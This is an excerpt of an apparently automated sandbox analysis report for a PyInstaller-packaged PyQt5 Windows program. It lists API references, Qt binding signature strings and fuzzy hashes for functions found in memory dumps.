                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82316111B29E5241FB50FB28D8916BAE250AFC47A0FC14435EE0E4A6D5EEECE81CC720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?drawTiledPixmap@QPainter@@QEAAXAEBVQRectF@@AEBVQPixmap@@AEBVQPointF@@@Z.QT5GUI ref: 00007FF89D9A5F3A
                                                                                                                                                                                                                                          • ?drawTiledPixmap@QPainter@@QEAAXAEBVQRect@@AEBVQPixmap@@AEBVQPoint@@@Z.QT5GUI ref: 00007FF89D9A601E
                                                                                                                                                                                                                                          • ?drawTiledPixmap@QPainter@@QEAAXAEBVQRectF@@AEBVQPixmap@@AEBVQPointF@@@Z.QT5GUI ref: 00007FF89D9A6132
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawPainter@@Pixmap@Pixmap@@Tiled$F@@@PointRect$Point@@@Rect@@
                                                                                                                                                                                                                                          • String ID: BJ9J9|J1$BJ9J9|J9$BiiiiJ9|ii$QPainter$drawTiledPixmap$drawTiledPixmap(self, rectangle: QRectF, pixmap: QPixmap, pos: Union[QPointF, QPoint] = QPointF())drawTiledPixmap(self, rectangle: QRect, pixmap: QPixmap, pos: QPoint = QPoint())drawTiledPixmap(self, x: int, y: int, width: int, height: int, pixmap: QPixmap,
                                                                                                                                                                                                                                          • API String ID: 2619674422-3544056308
                                                                                                                                                                                                                                          • Opcode ID: fbf0e85d4ae795fe20a8b35071a35a2b3043c1a19245c657ed1321e746889b2d
                                                                                                                                                                                                                                          • Instruction ID: 41c898b7d394bec2bf09039b4b6ffba972a7ee0982e930e193c82002fb1e64c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf0e85d4ae795fe20a8b35071a35a2b3043c1a19245c657ed1321e746889b2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E91C637A19F45DAE711CF65E48019DB3B8FB48B88B504236EA8E53B28EF38E155C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?map@Transform@@V2@@$Concurrency::cancel_current_taskDeallocLineLine@@PointPoint@@malloc
                                                                                                                                                                                                                                          • String ID: J1J9$J9J9
                                                                                                                                                                                                                                          • API String ID: 195627164-2568843907
                                                                                                                                                                                                                                          • Opcode ID: 36a2918275401c536ff13508c2a07f66cab95c845ef2f1bfb27fb68f89e8c33c
                                                                                                                                                                                                                                          • Instruction ID: 8676d50aa07899011077bd5d864f3695998b3b2e5cd8553e806debfce2a96bda
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a2918275401c536ff13508c2a07f66cab95c845ef2f1bfb27fb68f89e8c33c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14F18C33A09B4989D7218F36E8841A973A1FF59BC4F159332EA8E67764EF29F0509704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Rect$?drawArc@Painter@@$Rect@@@
                                                                                                                                                                                                                                          • String ID: BJ9ii$Biiiiii$QPainter$drawArc$drawArc(self, rect: QRectF, a: int, alen: int)drawArc(self, r: QRect, a: int, alen: int)drawArc(self, x: int, y: int, w: int, h: int, a: int, alen: int)
                                                                                                                                                                                                                                          • API String ID: 3371730212-2814619037
                                                                                                                                                                                                                                          • Opcode ID: 5a68282015af09683cd19c479c651493e8e32a9cd16c0ddd8da73b9398c1bc91
                                                                                                                                                                                                                                          • Instruction ID: 8ffa64677a2cbf662044c2dfe84e60cc5110083101efb468c3d1f3c366c36abb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a68282015af09683cd19c479c651493e8e32a9cd16c0ddd8da73b9398c1bc91
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E61E437619F85D9D760CF65E48029973B8FB58B88F504236EA8E17B28EF38E159C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?cellAt@QTextTable@@QEBA?AVQTextTableCell@@HH@Z.QT5GUI ref: 00007FF89D96FB06
                                                                                                                                                                                                                                          • ?cellAt@QTextTable@@QEBA?AVQTextTableCell@@H@Z.QT5GUI ref: 00007FF89D96FB88
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?cellCell@@TableTable@@$malloc
                                                                                                                                                                                                                                          • String ID: BJ9$Bii$QTextTable$cellAt$cellAt(self, row: int, col: int) -> QTextTableCellcellAt(self, position: int) -> QTextTableCellcellAt(self, c: QTextCursor) -> QTextTableCell
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF71250F0AA,?,?,0000029FD75F69C8,00007FF71250AD53,?,?,?,00007FF71250AC4A,?,?,?,00007FF712505F3E), ref: 00007FF71250EE8C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF71250F0AA,?,?,0000029FD75F69C8,00007FF71250AD53,?,?,?,00007FF71250AC4A,?,?,?,00007FF712505F3E), ref: 00007FF71250EE98
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2C9E
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7124F3706,?,00007FF7124F3804), ref: 00007FF7124F2D63
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7124F2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?insertText@QTextCursor@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FF89D95C05E
                                                                                                                                                                                                                                          • ?insertText@QTextCursor@@QEAAXAEBVQString@@AEBVQTextCharFormat@@@Z.QT5GUI ref: 00007FF89D95C120
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?insertCursor@@Text@$CharFormat@@@String@@String@@@
                                                                                                                                                                                                                                          • String ID: BJ1$BJ1J9$QTextCursor$insertText$insertText(self, text: Optional[str])insertText(self, text: Optional[str], format: QTextCharFormat)
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?translated@QPolygon@@QEBA?AV1@HH@Z.QT5GUI ref: 00007FF89D941A96
                                                                                                                                                                                                                                          • ?translated@QPolygon@@QEBA?AV1@AEBVQPoint@@@Z.QT5GUI ref: 00007FF89D941B24
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?translated@Polygon@@$Point@@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$Bii$QPolygon$translated$translated(self, dx: int, dy: int) -> QPolygontranslated(self, offset: QPoint) -> QPolygon
                                                                                                                                                                                                                                          • API String ID: 3315525380-1045378559
                                                                                                                                                                                                                                          • Opcode ID: 56048af5a1eb98eb44732044b9bf2a26ad43173e37cf0660e55ad2240a688da6
                                                                                                                                                                                                                                          • Instruction ID: 810a45247d7169d723246489214c043cc867c3accbaa715f4bdaffd0cd084908
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56048af5a1eb98eb44732044b9bf2a26ad43173e37cf0660e55ad2240a688da6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E315C37A19A46C2EB108F15E8892A973A4FB88FC4F904136DA8E07324EF3CE555CB44
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?insertRow@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FF89D9B1B50
                                                                                                                                                                                                                                          • ?insertRow@QStandardItem@@QEAAXHPEAV1@@Z.QT5GUI ref: 00007FF89D9B1BFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?insertItem@@Row@$Item@@@@@List@V1@@
                                                                                                                                                                                                                                          • String ID: BiJ3$BiJ:$QStandardItem$insertRow$insertRow(self, row: int, items: Iterable[QStandardItem])insertRow(self, arow: int, aitem: Optional[QStandardItem])
                                                                                                                                                                                                                                          • API String ID: 1324998375-2342085720
                                                                                                                                                                                                                                          • Opcode ID: 78bcdde13c35d34ade6d95a11ac12409132ab41da8f4522610fe512a8700e2f7
                                                                                                                                                                                                                                          • Instruction ID: b71c4439b8549b53d76f5d05bda169f878b5e434b7d1fb75acc5933fb674b546
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78bcdde13c35d34ade6d95a11ac12409132ab41da8f4522610fe512a8700e2f7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB410237A08F8682DB20CF11E8881AA73A4FB88B94F514136DA9E43724EF3DE558C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?insertRows@QStandardItem@@QEAAXHH@Z.QT5GUI ref: 00007FF89D9B20BE
                                                                                                                                                                                                                                          • ?insertRows@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FF89D9B2165
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?insertItem@@Rows@$Item@@@@@List@
                                                                                                                                                                                                                                          • String ID: BiJ3$Bii$QStandardItem$insertRows$insertRows(self, row: int, count: int)insertRows(self, row: int, items: Iterable[QStandardItem])
                                                                                                                                                                                                                                          • API String ID: 2942836812-2112208841
                                                                                                                                                                                                                                          • Opcode ID: c36277484ea8555968afc27835697a77a39618c5012da645e2e09e0b5861bae6
                                                                                                                                                                                                                                          • Instruction ID: 7a352f7e90610faa1d600bdc587e9c1f619fb0b3aeb15b3ad50a415819c0f5dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c36277484ea8555968afc27835697a77a39618c5012da645e2e09e0b5861bae6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB410577618B86C5DB208B11E8882AA73A4FB88BD4F504136DA8E03724EF3DE559CB44
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setFont@QTextCharFormat@@QEAAXAEBVQFont@@@Z.QT5GUI ref: 00007FF89D987EEA
                                                                                                                                                                                                                                          • ?setFont@QTextCharFormat@@QEAAXAEBVQFont@@W4FontPropertiesInheritanceBehavior@1@@Z.QT5GUI ref: 00007FF89D987F86
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCharFont@Format@@Text$Behavior@1@@FontFont@@Font@@@InheritanceProperties
                                                                                                                                                                                                                                          • String ID: BJ9$BJ9E$QTextCharFormat$setFont$setFont(self, font: QFont)setFont(self, font: QFont, behavior: QTextCharFormat.FontPropertiesInheritanceBehavior)
                                                                                                                                                                                                                                          • API String ID: 3105797926-1211473390
                                                                                                                                                                                                                                          • Opcode ID: a4668f7b488c87cddc3ada6f24f15cd0e06f903e4bb5c80f9076c8a07d7869ed
                                                                                                                                                                                                                                          • Instruction ID: fe71a445f83816dd3f614b4cc95fd99922478a0c3d45a9c7a447124dda8feaa8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4668f7b488c87cddc3ada6f24f15cd0e06f903e4bb5c80f9076c8a07d7869ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0331E477A09F4681EB60CB45E8842AA73A4FB88BD4F408136DACE43724EF3CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setBrush@@Format@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextFrameFormat$setBorderBrush$setBorderBrush(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 3306687108-1880163661
                                                                                                                                                                                                                                          • Opcode ID: 9cc11a58f7ebad3517043aae54ddd8807013e59c791dbf378d5f80e5ec970db6
                                                                                                                                                                                                                                          • Instruction ID: 4e7730ce43b23a78da39e2eabc760430e85f6638227d92a8847590936af96cf8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cc11a58f7ebad3517043aae54ddd8807013e59c791dbf378d5f80e5ec970db6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831F877A08B8AD2DB208F15E8891AD73A4FB48B84F914132DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setBrush@@Format@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextTableCellFormat$setTopBorderBrush$setTopBorderBrush(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 3306687108-777721257
                                                                                                                                                                                                                                          • Opcode ID: ca222108a972cdf7969ea7699774dca9d7966e36fae96f634535d52fe9b00c00
                                                                                                                                                                                                                                          • Instruction ID: 85844418f93e42b1162862916d1e77b721a6cf10f926b1299689e60533a9f730
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca222108a972cdf7969ea7699774dca9d7966e36fae96f634535d52fe9b00c00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8531F637A08B8AD2DB209F11E8891AD73B4FB48B84F914132DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setBrush@@Format@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextFormat$setForeground$setForeground(self, brush: Union[QBrush, Union[QColor, Qt.GlobalColor], QGradient])
                                                                                                                                                                                                                                          • API String ID: 3306687108-1575198602
                                                                                                                                                                                                                                          • Opcode ID: d7e73f717b8469d12a53372b786ad97307faa9c87eb0735ce0655371bbf71c74
                                                                                                                                                                                                                                          • Instruction ID: 5b50b149ce11b7f5357837eae9c0d321a79bd5a27845620935fbf1aa68146a84
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7e73f717b8469d12a53372b786ad97307faa9c87eb0735ce0655371bbf71c74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7731F837A08B8AD2DB208F11E88919E73B4FB48B84F914132DA9E43724EF3CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@String@@@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextImageFormat$setName$setName(self, aname: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 3611022156-3603350003
                                                                                                                                                                                                                                          • Opcode ID: 8ddb322891db415919c9412a804c798a3e5d4c0c6f2da91f195a70ecb7db8acf
                                                                                                                                                                                                                                          • Instruction ID: 8bd27eade7a618014bf995b2c2ba710fbbb7237218b346c5c795c13a956de849
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ddb322891db415919c9412a804c798a3e5d4c0c6f2da91f195a70ecb7db8acf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231D637A08B86D5DB208F12E8891AA73B4FB48BD4F914032DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@String@@@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextCharFormat$setFontStyleName$setFontStyleName(self, styleName: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 3611022156-1849772701
                                                                                                                                                                                                                                          • Opcode ID: a741d49449aec63e92a66d676d2b31264c350f6c774362186e362bb769ee7808
                                                                                                                                                                                                                                          • Instruction ID: 6002d6b136a6e6b5f2a82b6650a782d170693a9b91610ecd7c8358985e22eb1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a741d49449aec63e92a66d676d2b31264c350f6c774362186e362bb769ee7808
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F31E237A08B8AD1DB208F15E8891A973B4FB48BC4F914032DA9E43724EF3DE559C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?sender@Object@@RestoreSave
                                                                                                                                                                                                                                          • String ID: QTextDocument$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
                                                                                                                                                                                                                                          • API String ID: 10903585-1049448907
                                                                                                                                                                                                                                          • Opcode ID: fa7c5dd0ecf7c5a5c2f78998e725c0a3f339fc6dbd449ca055905f4b651a8f15
                                                                                                                                                                                                                                          • Instruction ID: 410a34a50e284b022d80fda1e329885f69474a0acce80429ea29db6e28c7b627
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7c5dd0ecf7c5a5c2f78998e725c0a3f339fc6dbd449ca055905f4b651a8f15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E210A37A09B4681EB609F51E8496A963A4FB48FD0F948032DA8E43724FF3CF159C704
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: List_$FromItemLongLong_$?point@Polygon@@
                                                                                                                                                                                                                                          • String ID: (N)
                                                                                                                                                                                                                                          • API String ID: 3087083472-3847697581
                                                                                                                                                                                                                                          • Opcode ID: 3cd72ab1dc4af6f92d4a2d0cedb26713351c2479714c49bc34b1c7264cc128e1
                                                                                                                                                                                                                                          • Instruction ID: 57414822897500e23d29cf8fee73c58d7ce232b123f8736a064100493f85e051
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cd72ab1dc4af6f92d4a2d0cedb26713351c2479714c49bc34b1c7264cc128e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B119177609A41CAD7208F55F88516AA7A1FB88FC1B498031EF8F43729EE3CE455C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C5FEA
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C6017
                                                                                                                                                                                                                                          • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C6055
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C60AA
                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C60CB
                                                                                                                                                                                                                                          • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C611F
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C6149
                                                                                                                                                                                                                                          • ??1QTextFormat@@QEAA@XZ.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C6154
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Font@@V0@@$Array$Data@@U1@_$?allocate@?deallocate@AllocationData@@@@@Flags@Format@@Option@Textmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 203156587-0
                                                                                                                                                                                                                                          • Opcode ID: 5cca0e70afa3c57de14d3176ae8a5be28cef10339677c22d696923d34b07661c
                                                                                                                                                                                                                                          • Instruction ID: d48409011ee8f1451e297c2ac9d1c5bc0460942d795863c921e1494b4cb69659
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cca0e70afa3c57de14d3176ae8a5be28cef10339677c22d696923d34b07661c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15518C73A04A4187EB60AF29E88426DB7A1FB94FD5F158132DB9F477A1DE38E442C704
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
